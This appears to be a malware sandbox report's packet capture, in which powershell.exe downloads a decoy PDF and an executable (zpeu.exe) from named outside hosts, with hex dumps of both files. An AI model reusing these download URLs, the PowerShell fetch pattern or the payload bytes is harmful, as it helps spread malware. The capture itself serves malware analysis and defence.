                                                        1192.168.2.349698203.175.174.6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 1, 2023 12:14:17.270826101 CEST441OUTGET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                        Host: www.bluemaxxlaser.com
                                                        Connection: Keep-Alive
                                                        Jun 1, 2023 12:14:17.439981937 CEST442INHTTP/1.1 200 OK
                                                        Date: Thu, 01 Jun 2023 10:14:17 GMT
                                                        Server: Apache
                                                        Last-Modified: Sun, 28 May 2023 21:58:29 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 653248
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/pdf
                                                        Data Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35 33 32 3e 5d 2f 49 6e 64 65 78 5b 31 32 39 20 33 38 5d 2f 49 6e 66 6f 20 31 32 38 20 30 20 52 2f 4c 65 6e 67 74 68 20 38 39 2f 50 72 65 76 20 36 35 32 37 37 31 2f 52 6f 6f 74 20 31 33 30 20 30 20 52 2f 53 69 7a 65 20 31 36 37 2f 54 79 70 65 2f 58 52 65 66 2f 57 5b 31 20 33 20 31 5d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 62 62 64 60 10 60 60 62 60 60 fe 04 22 19 3a 40 24 53 19 58 c4 06 44 1a 1d 05 8b 27 82 c8 6e 03 b0 6c 1b 88 64 ac 00 8b c7 02 49 46 77 66 b0 78 2d 88 d4 bb 02 24 ff 1f 34 66 60 02 9a 2c 08 56 c3 c0 38 00 e4 7f 06 c6 9c 37 40 f2 3f 3f 03 40 80 01 00 c4 3a 0e 4d 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 73 74 61 72 74 78 72 65 66 0d 0a 30 0d 0a 25 25 45 4f 46 0d 0a 20 20 20 20 20 20 20 0d 0a 31 36 35 20 30 20 6f 62 6a 0d 3c 3c 2f 43 20 31 38 30 2f 45 20 31 36 34 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 20 32 30 32 2f 4c 65 6e 67 74 68 20 31 36 37 2f 4f 20 31 32 36 2f 53 20 37 34 2f 56 20 31 34 32 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 62 60 60 60 61 60 60 aa 64 60 65 60 48 88 67 10 62 40 00 21 06 66 a0 1c 0b 03 87 8b 03 0b 83 75 76 03 03 67 e0 d2 75 8b 0e 28 3b a4 70 30 f0 1c 32 91 68 e4 e8 40 16 05 ea d0 62 e0 bc b6 1a 48 f3 00 31 2f d8 8c 58 06 01 46 49 a6 fb 86 19 0c 2c 5d 97 19 35 19 a5 19 18 dc 96 31 2a e8 96 0b fe 64 d2 06 ab d0 66 e0 bc 69 0c a4 19 81 a8 12 48 eb 30 70 de 5a 03 e1 33 dd 85 bb 45 9f 81 f3 c9 2f 88 28 43 21 10 eb 32 70 de ed 04 d2 4c 0c 0c ec 85 70 55 46 0c 9c 5f be 43 55 bd 01 08 30 00 be 98 22 2e 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 31 33 30 20 30 20 6f 62 6a 0d 3c 3c 2f 41 63 72 6f 46 6f 72 6d 20 31 34 34 20 30 20 52 2f 4d 65 74 61 64 61 74 61 20 34 38 20 30 20 52 2f 4e 61 6d 65 73 20 31 34 35 20 30 20 52 2f 4f 75 74 6c 69 6e 65 73 20 31 30 33 20 30 20 52 2f 50 61 67 65 73 20 31 32 37 20 30 20 52 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 31 31 37 20 30 20 52 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 3e 3e 0d 65 6e 64 6f 62 6a 0d 31 33 31 20 30 20 6f 62 6a 0d 3c 3c 2f 43 6f 6e 74 65 6e 74 73 20 31 33 32 20 30 20 52 2f 43 72 6f 70 42 6f 78 5b 30 20 30 20 35 39 35 2e 34 34 20 38 34 31 2e 36 38 5d 2f 47 72 6f 75 70 3c 3c 2f 43 53 2f 44 65 76 69 63 65 52 47 42 2f 53 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 2f 54 79 70 65 2f 47 72 6f 75 70 3e 3e 2f 4d 65 64 69 61 42 6f 78 5b 30 20 30 20 35 39 35 2e 34 34 20 38 34 31
                                                        Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>streamhbbd```b``":@$SXD'nldIFwfx-$4f`,V87@??@:Mendstreamendobjstartxref0%%EOF 165 0 obj<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>streamhb```a``d`e`Hgb@!fuvgu(;p02h@bH1/XFI,]51*dfiH0pZ3E/(C!2pLpUF_CU0".endstreamendobj130 0 obj<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>endobj131 0 obj<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/Type/Group>>/MediaBox[0 0 595.44 841
                                                        Jun 1, 2023 12:14:17.440037012 CEST443INData Raw: 2e 36 38 5d 2f 50 61 72 65 6e 74 20 31 32 37 20 30 20 52 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 45 78 74 47 53 74 61 74 65 3c 3c 2f 47 53 30 20 31 34 36 20 30 20 52 3e 3e 2f 46 6f 6e 74 3c 3c 2f 43 32 5f 30 20 31 35 31 20 30 20 52 2f 43 32 5f 31
                                                        Data Ascii: .68]/Parent 127 0 R/Resources<</ExtGState<</GS0 146 0 R>>/Font<</C2_0 151 0 R/C2_1 153 0 R/C2_2 158 0 R/TT0 161 0 R/TT1 164 0 R>>/ProcSet[/PDF/Text/ImageC]/XObject<</Im0 141 0 R/Im1 142 0 R>>>>/Rotate 0/StructParents 0/Tabs/S/Type/Page>>endob
                                                        Jun 1, 2023 12:14:17.440083981 CEST445INData Raw: 4e 5a c8 f5 22 96 52 50 da 90 e3 bb 5d 72 b5 4b ed e2 2e 62 75 a8 57 bc e4 52 97 2f 95 20 b9 12 9a e4 a2 e4 5a 44 2e 5d c4 e6 e4 fe ab af 36 4f 1f 7f b1 f9 76 77 fd 3f 32 96 97 ff 92 bf b7 17 5f 6e 9e fe 20 05 7f bc 79 7d fb e6 ea e6 ad 64 ff fa
                                                        Data Ascii: NZ"RP]rK.buWR/ ZD.]6Ovw?2_n y}dHzf/|{^>QnVA)kA|o^_?_7/y?_wrfw'jvo>~w_n^_8kxO_$
                                                        Jun 1, 2023 12:14:17.440118074 CEST446INData Raw: 98 e3 7b 45 e8 55 49 51 58 fe 21 85 28 f5 64 55 9a b0 b2 d1 be 7e 23 ea 37 64 15 f9 de 22 b1 af 23 ad fb dc 2a 26 42 fb db 8e fb 8b be ce fd 1c 7d 3c d1 3f f6 43 da c5 7b a8 83 b3 30 cf 9c 2c 1a 13 16 40 16 22 b8 7a 6f 76 b3 28 64 9f 9a 22 37 41
                                                        Data Ascii: {EUIQX!(dU~#7d"#*&B}<?C{0,@"zov(d"7Ai{fXeN>]}|%CZl1qKIj"uP1r|(4[T|8qM101Kc`9ZW}`b5ETkD A+>6wKo
                                                        Jun 1, 2023 12:14:17.440157890 CEST447INData Raw: 7c ea fb a7 ae 63 4d 96 38 12 15 26 db 47 d3 ec 40 86 39 f4 44 82 13 f9 54 aa c4 0a c1 84 d6 8e d2 39 3c 53 0b 8e 89 c0 b2 07 ff 96 52 dd a9 44 75 1c bc 05 ba ce a9 f4 e0 d7 2b 93 77 d4 63 30 df c2 1d 90 28 00 7f 24 61 2e 7a 41 bf 41 19 8c 85 7d
                                                        Data Ascii: |cM8&G@9DT9<SRDu+wc0($a.zAA}4I=hJ(z6m}FL~dIu,`hF:Wc$gh8OO>UjGA=03^mh!)f#i%^N*CjK6&w*%d
                                                        Jun 1, 2023 12:14:17.440207958 CEST449INData Raw: 46 98 0c 20 2f 3d cf e6 0f 88 3e 8c cb 1e 86 8c d9 4a 8d 08 71 4f f9 03 1d 16 9d 8d 7b eb 48 79 1c 7b 62 99 ba bb ff ec 63 e9 14 50 af 1a 88 cf a9 da 8c a4 71 1b 89 89 d2 8a d7 7d f8 b1 34 c2 18 08 f2 58 e4 cf 2a 76 2b 00 d7 39 e8 f4 39 a8 f4 d9
                                                        Data Ascii: F /=>JqO{Hy{bcPq}4X*v+99Q,3*on bby( &)9l,"/Gf9Awfx8w3l}@/9`LJvU*42TH3t2uPP'E`tayk~14[{a:Od
                                                        Jun 1, 2023 12:14:17.440253019 CEST450INData Raw: d9 5a 26 e9 5a ea 5b 9f f2 54 d5 b3 20 79 d4 e9 64 02 42 9f 26 0d 68 2f 64 e1 20 b4 0c 48 27 e6 57 63 00 22 a1 1b 3a 31 b0 90 fa a2 8b e6 4b 9c e6 39 4f 83 f1 d0 0a b4 85 e8 ea ab f6 cf 0b 2b f7 d5 fc d2 35 a1 1f b2 a1 ca 04 86 a0 30 73 a9 db 94
                                                        Data Ascii: Z&Z[T ydB&h/d H'Wc":1K9O+50sxjhA|c~OM',/bnB_ D0qNR8\UE9E^}zAox>;1lc/E##,wMrqRb{57/O#|?Nx#:"Qsxm
                                                        Jun 1, 2023 12:14:17.440323114 CEST451INData Raw: 5d e4 44 49 b2 f5 43 4f 45 41 72 34 26 17 0d 58 75 b2 dd c7 56 1d 5b 44 b8 02 4a 7c b0 16 20 19 22 04 11 df b2 be ae ae 5b 93 de c0 7f 80 09 74 0c 7f 0e d0 c4 e5 02 3e 13 ea 28 a1 31 b6 b3 84 16 e4 e8 ad 04 9a 98 23 4a 85 c1 1e f4 2e 59 09 ac 45
                                                        Data Ascii: ]DICOEAr4&XuV[DJ| "[t>(1#J.YEl>$GZ!8.=8d+JK(iR1CHRyS1_05YNwkOr1LgRp(AHB]9TJM"U"~qT
                                                        Jun 1, 2023 12:14:17.440370083 CEST453INData Raw: 2e b7 ae c8 00 8f c8 4a f9 1b b3 0d 5f 51 55 7b 22 91 da ad cc 51 18 1a 61 63 c7 17 36 0a df 9d 9d 2d 58 29 a8 26 76 cc 2b 9c 47 0c a1 05 ae 06 0a 03 82 c4 00 db 85 db 30 12 b1 27 0d c0 db 07 ab 04 85 d0 1e 84 a4 f7 84 c7 70 6c 05 e0 75 01 6d 82
                                                        Data Ascii: .J_QU{"Qac6-X)&v+G0'plum.XURY%\.CgxS2'3" Qd2LrC8_#:bhn5,,d00~c=y<6'??-X2+qat+L@l8=I'iwy<q
                                                        Jun 1, 2023 12:14:17.440416098 CEST454INData Raw: 2d 58 8b 25 d3 a6 94 33 1e cb cc 41 8f 42 03 92 f1 13 4c a5 09 8c 5c b6 21 5c 04 b0 16 47 f4 04 ef 02 f7 13 35 fe 0a f8 a7 84 6b ee f6 1c 81 72 68 12 a7 0a 2a 13 ad fb 5d d4 e6 48 f8 40 07 9a 0d 30 36 e0 2b 3b 33 11 7f 49 63 38 e1 e5 0d 70 f3 c2
                                                        Data Ascii: -X%3ABL\!\G5krh*]H@06+;3Ic8p!V X(hFFP6gC5W#6j@NP$RXYa9BWy>@-6NVtZ180 sjzxS4t<F2a:Z$M5&
                                                        Jun 1, 2023 12:14:17.608191013 CEST455INData Raw: 37 57 fe 55 1b 38 c8 06 71 4b e0 39 24 1b 0c 40 52 49 1f 15 9a 3a e7 24 23 aa 11 e0 e6 00 13 e3 b3 63 3f d0 ab 1b 0e fb 01 8e b3 32 b6 55 67 17 c6 5e c0 54 16 1a 54 b3 6e 77 ec 01 80 8c 9b a7 cd 94 4e d4 aa 70 ec d1 e6 d8 5b dc 47 a8 07 3d b9 d9
                                                        Data Ascii: 7WU8qK9$@RI:$#c?2Ug^TTnwNp[G=~YOyb7fE+5IT$0D_%AJu'>q/nNLa!0q#@w4aSDA"/|KF8lJL


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.34969784.16.234.51443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2023-06-01 10:14:14 UTC0OUTGET /zp/zpeu.exe HTTP/1.1
                                                        Host: www.dld.ae
                                                        Connection: Keep-Alive
                                                        2023-06-01 10:14:14 UTC0INHTTP/1.1 200 OK
                                                        Date: Thu, 01 Jun 2023 10:14:14 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Thu, 01 Jun 2023 09:47:42 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 344681
                                                        Content-Type: application/x-msdownload
                                                        2023-06-01 10:14:14 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 27 95 75 59 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 2a 02 00 00 08 00
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPEL'uYd*
                                                        2023-06-01 10:14:14 UTC8INData Raw: 40 00 7b 16 40 00 cc 16 40 00 35 17 40 00 5c 17 40 00 6f 17 40 00 0c 19 40 00 0f 19 40 00 41 19 40 00 56 19 40 00 68 19 40 00 ff 19 40 00 30 1a 40 00 72 1a 40 00 b0 1a 40 00 4d 1b 40 00 71 1b 40 00 19 1c 40 00 19 1c 40 00 ed 1c 40 00 0e 1d 40 00 33 1d 40 00 57 1d 40 00 b3 1d 40 00 43 1e 40 00 77 1e 40 00 00 1f 40 00 52 1f 40 00 86 1f 40 00 2b 20 40 00 fe 20 40 00 53 22 40 00 d7 22 40 00 06 23 40 00 48 23 40 00 88 23 40 00 de 23 40 00 7e 24 40 00 f2 24 40 00 5c 25 40 00 70 25 40 00 92 25 40 00 44 26 40 00 e7 27 40 00 1b 28 40 00 35 28 40 00 62 28 40 00 a7 28 40 00 a2 29 40 00 2f 2a 40 00 bf 2a 40 00 bf 2a 40 00 9a 2a 40 00 92 25 40 00 44 26 40 00 dc 1a 40 00 e0 1a 40 00 e4 1a 40 00 e9 1a 40 00 f6 1a 40 00 fa 1a 40 00 fe 1a 40 00 02 1b 40 00 0b 1b 40 00 15
                                                        Data Ascii: @{@@5@\@o@@@A@V@h@@0@r@@M@q@@@@@3@W@@C@w@@R@@+ @ @S"@"@#@H#@#@#@~$@$@\%@p%@%@D&@'@(@5(@b(@(@)@/*@*@*@*@%@D&@@@@@@@@@@
                                                        2023-06-01 10:14:14 UTC15INData Raw: 0e 6a 07 e8 bc c9 ff ff 85 c0 75 03 40 eb 02 33 c0 50 6a 00 68 65 04 00 00 ff 75 08 ff d6 33 c0 5e 5d c2 10 00 55 8b ec 81 ec 80 00 00 00 8b 45 14 53 56 8b 75 10 57 6a dc 85 c0 5b 74 0b 0f ac c6 14 c1 e8 14 33 ff eb 4e 6a 14 81 fe 00 00 10 00 59 8b c6 73 06 6a 0a 59 6a dd 5b 81 fe 00 04 00 00 73 05 6a de 33 c9 5b 81 fe 33 33 ff ff 73 0d 33 c0 6a 14 40 5f d3 e0 99 f7 ff 03 c6 8b f0 25 ff ff ff 00 6a 0a 33 d2 8d 04 80 03 c0 d3 e8 d3 ee 59 f7 f1 8b fa 8d 45 c0 6a df 50 e8 85 17 00 00 50 8d 45 80 53 50 e8 7a 17 00 00 50 57 56 68 a0 a3 40 00 ff 75 0c be e8 36 42 00 56 e8 64 17 00 00 56 8b f8 e8 50 17 00 00 8d 04 47 50 ff 15 90 82 40 00 83 c4 18 56 ff 75 08 ff 35 d8 91 42 00 e8 5e 0d 00 00 5f 5e 5b c9 c2 10 00 8b 44 24 0c 33 c9 51 50 ff 74 24 10 ff 74 24 10 e8
                                                        Data Ascii: ju@3Pjheu3^]UESVuWj[t3NjYsjYj[sj3[33s3j@_%j3YEjPPESPzPWVh@u6BVdVPGP@Vu5B^_^[D$3QPt$t$
                                                        2023-06-01 10:14:14 UTC23INData Raw: 00 00 89 45 a8 7d 05 89 55 c8 eb 10 83 7d c8 0a 7d 06 83 6d c8 03 eb 04 83 6d c8 06 39 55 cc 74 1c 8b 45 ec 2b 45 d4 3b 45 8c 72 03 03 45 8c 8b 4d f8 33 db 43 8a 04 08 88 45 a5 eb 68 33 db 43 e9 cd 01 00 00 8b 45 fc 8b 4d c8 c7 45 cc 01 00 00 00 c7 85 7c ff ff ff 07 00 00 00 8d b4 48 80 01 00 00 e9 d3 05 00 00 83 7d 94 00 0f 84 67 07 00 00 8b 4d 90 8b 45 f4 c1 65 f0 08 0f b6 09 ff 4d 94 c1 e0 08 0b c1 ff 45 90 89 45 f4 8b 45 c0 39 45 b8 0f 85 ad 00 00 00 81 fb 00 01 00 00 0f 8d 05 01 00 00 0f b6 45 a5 d0 65 a5 8b 4d a8 c1 e8 07 89 45 b8 40 c1 e0 08 03 c3 8d 34 41 8b 4d f0 c1 e9 0b 66 8b 06 89 75 ac 0f b7 d0 0f af ca 39 4d f4 73 1a 83 65 c0 00 89 4d f0 b9 00 08 00 00 2b ca c1 f9 05 03 c8 03 db 66 89 0e eb 1d 29 4d f0 29 4d f4 66 8b c8 c7 45 c0 01 00 00 00
                                                        Data Ascii: E}U}}mm9UtE+E;ErEM3CEh3CEME|H}gMEeMEEE9EEeME@4AMfu9MseM+f)M)MfE
                                                        2023-06-01 10:14:14 UTC31INData Raw: 00 69 00 6e 00 63 00 6f 00 6d 00 70 00 6c 00 65 00 74 00 65 00 20 00 64 00 6f 00 77 00 6e 00 6c 00 6f 00 61 00 64 00 20 00 61 00 6e 00 64 00 20 00 64 00 61 00 6d 00 61 00 67 00 65 00 64 00 20 00 6d 00 65 00 64 00 69 00 61 00 2e 00 20 00 43 00 6f 00 6e 00 74 00 61 00 63 00 74 00 20 00 74 00 68 00 65 00 0a 00 69 00 6e 00 73 00 74 00 61 00 6c 00 6c 00 65 00 72 00 27 00 73 00 20 00 61 00 75 00 74 00 68 00 6f 00 72 00 20 00 74 00 6f 00 20 00 6f 00 62 00 74 00 61 00 69 00 6e 00 20 00 61 00 20 00 6e 00 65 00 77 00 20 00 63 00 6f 00 70 00 79 00 2e 00 0a 00 0a 00 4d 00 6f 00 72 00 65 00 20 00 69 00 6e 00 66 00 6f 00 72 00 6d 00 61 00 74 00 69 00 6f 00 6e 00 20 00 61 00 74 00 3a 00 0a 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 6e 00 73 00 69 00 73 00 2e 00 73 00
                                                        Data Ascii: incomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.s
                                                        2023-06-01 10:14:14 UTC39INData Raw: 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03 03 13 03 03
                                                        Data Ascii:
                                                        2023-06-01 10:14:14 UTC47INData Raw: ff 8e 52 09 ff 93 59 12 ff 9b 63 1d ff a1 6a 25 ff 9e 69 26 ff 88 54 12 ff 60 31 00 ff 49 26 02 c5 09 09 09 36 03 03 03 17 01 01 01 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 02 02 02 11 04 06 09 2f 47 29 05 94 9c 5d 0f ff b8 76 24 ff c9 81 29 ff ce 85 29 ff d2 86 28 ff d1 82 23 ff cf 81 20 ff d1 82 20 ff d3 83 1f ff d5 83 1f ff d5 84 1f ff d8 86 1f ff db 87 1e ff dd 89 22 ff e3 9d 46 ff e5 a0 4c ff e6 a0 4b ff e7 9d 43 ff e1 8c 20 ff c7 86 20 ff b2 8f 39 ff b2 91 3d ff b0 90 3b ff af 90 3b ff b1 92 3b ff b2 93 3b ff b3 94 3c ff b3 94 3a ff b2 94 3a ff b1 94 3b ff b1 91 32 ff af 85 1a ff b1 92 32 ff af 8b 22 ff af 87 18 ff b2 94 30 ff b0 8c 1d ff b6 8a 29 ff b9 8b 3c ff b5 89 2c ff af 8a 16 ff b0 8c
                                                        Data Ascii: RYcj%i&T`1I&6/G)]v$))(# "FLKC 9=;;;;<::;22"0)<,
                                                        2023-06-01 10:14:14 UTC54INData Raw: ff 08 73 0f ff 06 71 0d ff 05 70 0c ff 02 6d 0a ff 02 6e 09 ff 01 6f 0a ff 00 70 08 ff 00 6d 05 ff 03 70 0a ff 0e 73 0e ff 18 74 17 ff 27 7c 27 ff 3a 7b 3c ff 77 95 79 ff a1 a5 a2 ff b8 b2 b8 ff b4 b6 b4 ff ac b2 a9 ff a9 a9 99 ff a0 93 71 ff 91 90 74 ff 5d 8a 5d ff 3b 7c 3f ff 0a 6b 0d ff 02 71 0a ff 08 73 11 ff 09 71 10 ff 07 6f 0e ff 08 70 0f ff 09 73 10 ff 0a 70 10 ff 0b 72 10 ff 0b 70 0f ff 18 70 0f ff 2a 6e 0f ff 4f 68 0d ff 98 5e 0b ff a1 58 0a ff 9d 57 0a ff 99 56 09 ff 96 53 09 ff 91 51 09 ff 8d 4e 09 ff 89 4c 08 ff 85 4a 08 ff 81 48 08 ff 81 4a 0d ff 88 54 18 ff 90 5d 23 ff 92 61 29 ff 86 56 1f ff 63 35 04 ff 54 24 00 f9 1c 12 07 59 01 02 03 12 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: sqpmnopmpst'|':{<wyqt]];|?kqsqopsprpp*nOh^XWVSQNLJHJT]#a)Vc5T$Y
                                                        2023-06-01 10:14:14 UTC62INData Raw: ff b6 79 35 ff b5 79 33 ff b5 77 32 ff b4 77 31 ff b4 77 31 ff b5 78 31 ff b6 77 31 ff b7 77 31 ff b6 77 31 ff b1 70 29 ff b9 93 6a ff d4 d9 e0 ff c2 c7 c8 ff 98 a5 9a ff a4 98 a4 ff ce c8 cf ff b9 ad bb ff a0 a4 a1 ff 90 89 8f ff a0 78 9a ff 93 71 8f ff 7d 7d 7e ff 8a 5d 7f ff 75 73 76 ff 7e 75 7f ff a6 a6 ab ff c1 c6 c9 ff be c2 c6 ff be c2 c6 ff be c2 c6 ff c1 c5 ca ff a7 ae b2 ff 8b 6f 44 ff 98 72 3c ff 98 73 3e ff 9a 74 3f ff 89 6d 3c ff 2d 52 31 ff 0e 42 28 ff 32 52 3b ff 6f 6c 6f ff 6e 6c 6e ff 6b 6c 6e ff 6f 65 56 ff 81 61 36 ff 73 68 50 ff 6f 6c 5f ff 6b 66 58 ff 6c 6a 61 ff 6d 6b 61 ff 6c 69 60 ff 68 64 5a ff 66 5e 4f ff 67 66 5b ff 60 53 3a ff 6a 51 2f ff 5a 4f 39 ff 97 a4 ad ff c3 c6 ca ff be c2 c6 ff be c2 c6 ff be c2 c6 ff be c2 c6 ff bd c1
                                                        Data Ascii: y5y3w2w1w1x1w1w1w1p)jxq}}~]usv~uoDr<s>t?m<-R1B(2R;olonlnklnoeVa6shPol_kfXljamkali`hdZf^Ogf[`S:jQ/ZO9
                                                        2023-06-01 10:14:14 UTC70INData Raw: ff 33 2a 23 ff 34 22 15 ff 37 24 16 ff 3a 26 16 ff 39 25 15 ff 3a 25 15 ff 66 38 16 ff 71 3c 16 ff 6c 3a 14 ff 6a 3a 15 ff 74 44 20 ff 7e 51 2f ff 85 58 37 ff 7a 50 2e ff 4e 24 0a ff 2f 0f 01 df 0b 07 04 2b 00 00 01 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 01 02 03 11 32 19 06 9f 89 53 29 ff ac 72 46 ff ad 74 46 ff ad 73 44 ff aa 6d 3f ff a8 6b 3a ff a8 6a 3a ff a7 68 39 ff a8 69 39 ff a8 69 39 ff a8 69 39 ff a7 66 34 ff b5 8d 6f ff cb d2 d7 ff cd d0 d4 ff bc c9 bf ff ac 8c a6 ff 9e 6f
                                                        Data Ascii: 3*#4"7$:&9%:%f8q<l:j:tD ~Q/X7zP.N$/+2S)rFtFsDm?k:j:h9i9i9i9f4oo
                                                        2023-06-01 10:14:14 UTC78INData Raw: ff aa ad b1 ff d7 dc e0 ff d6 da dc ff b6 c2 cc ff 08 1c 7c ff 00 02 75 ff 43 87 6b ff 43 8a 6f ff 46 8f 6a ff 34 69 6e ff 00 00 72 ff 1a 36 84 ff c4 ce d3 ff d5 d8 db ff d4 d8 dc ff ca cd d2 ff 3a 3a 3c ff 27 27 27 ff 2c 2c 2c ff 2b 2b 2b ff 2d 2d 2d ff 29 29 29 ff 2d 2d 2d ff 28 27 27 ff 2e 2e 2f ff c0 c5 c9 ff d5 d9 dd ff d6 d9 dc ff b7 c5 ce ff 0b 21 7f ff 00 00 6f ff 3b 5d 9c ff 56 88 a8 ff 45 77 96 ff 2b 46 93 ff 00 00 6d ff 1b 34 8b ff ca d2 d7 ff d4 d8 db ff d6 db df ff b4 b8 bb ff 24 24 24 ff 21 21 21 ff 23 23 23 ff 20 20 20 ff 21 21 21 ff 21 21 21 ff 21 21 21 ff 1e 1e 1e ff 40 40 40 e1 5c 5c 5c b1 58 58 58 b3 58 58 58 b3 5c 5c 5c b3 5f 5f 5f b3 69 69 69 b2 8d 8d 8d df b1 b0 b1 ff b4 b4 b4 ff 96 96 96 ff 52 52 52 db 05 05 05 13 00 00 00 00 00 00
                                                        Data Ascii: |uCkCoFj4inr6::<''',,,+++---)))---(''../!o;]VEw+Fm4$$$!!!### !!!!!!!!!@@@\\\XXXXXX\\\___iiiRRR
